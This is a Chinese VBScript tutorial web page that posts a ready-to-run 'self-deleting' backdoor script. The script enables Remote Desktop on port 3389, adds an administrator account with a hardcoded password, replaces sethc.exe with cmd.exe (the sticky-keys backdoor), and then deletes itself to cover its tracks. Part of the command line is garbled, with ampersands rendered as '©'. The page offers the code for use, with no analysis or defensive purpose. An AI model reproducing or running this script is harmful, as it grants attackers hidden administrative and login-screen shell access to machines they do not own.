当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > 可自删除 开启3389创建用户粘滞键后门的vbs

VBScript
网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
Vbs COM之打开/保存文件脚本代码
当某IP 连接我机器的3389端口 报警的脚本
利用WMI实现系统补丁检测分析
vbs 调用中文语音让你电脑听你的命令的实现代码
SQLids.vbs 0.7(最终版,以后改成gui界面的)
vbs 函数 获取数组字符串的最后一个LastOne 挺方便的
枚举域内计算机个数vbscript脚本(没环境,没测试)
VBS 脚本不能运行 提示Windows无法访问指定设备路径或文件
vbs 搜索代理地址实现代码[小偷程序]
vbscript 调用WebService实现代码
VBScript 算一算你从出生到现在共计多少天
VBS操作Excel常见方法
VBS 批量读取文件夹内所有的文本到Excel的脚本
vbs 合并多个excel文件的脚本
自动删除超过10天的文件及文件夹的vbs代码
VBScript 常用函数总结
利用WScript.Shell对象隐藏cmd命令行运行框的实现代码
常用VBS代码 值得一看
进程监控实现代码[vbs+bat]

VBScript 中的 可自删除 开启3389创建用户粘滞键后门的vbs


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 48 ::
收藏到网摘: n/a

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)